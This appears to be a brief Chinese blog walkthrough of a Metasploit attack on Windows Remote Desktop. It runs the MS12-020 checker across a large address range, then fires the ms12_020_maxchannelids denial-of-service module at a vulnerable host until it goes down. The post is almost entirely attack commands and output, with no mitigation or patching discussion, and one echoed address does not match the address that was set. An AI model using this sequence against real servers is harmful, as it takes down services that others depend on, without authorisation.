简述
Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Royce Davis "R3dy" <rdavis@accuvant.com>
Brandon McCann "zeknox" <bmccann@accuvant.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.3.0.1/17 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP
THREADS 50 yes The number of concurrent threads
Description:
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
References:
http://cvedetails.com/cve/2012-0002/
http://technet.microsoft.com/en-us/security/bulletin/MS12-020
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
http://www.exploit-db.com/exploits/18606
https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse
扫描
msf auxiliary(ms12_020_check) > run
[+] 10.3.2.1:3389 Vulnerable to MS12-020
[*] Scanned 32768 of 32768 hosts (100% complete)
[*] Auxiliary module execution completed
攻击
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.3.2.1
RHOST => 10.3.39.33
msf auxiliary(ms12_020_maxchannelids) > exploit
[*] 10.3.2.1:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.3.2.1:3389 - 210 bytes sent
[*] 10.3.2.1:3389 - Checking RDP status...
[+] 10.3.2.1:3389 seems down
[*] Auxiliary module execution completed
4908
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
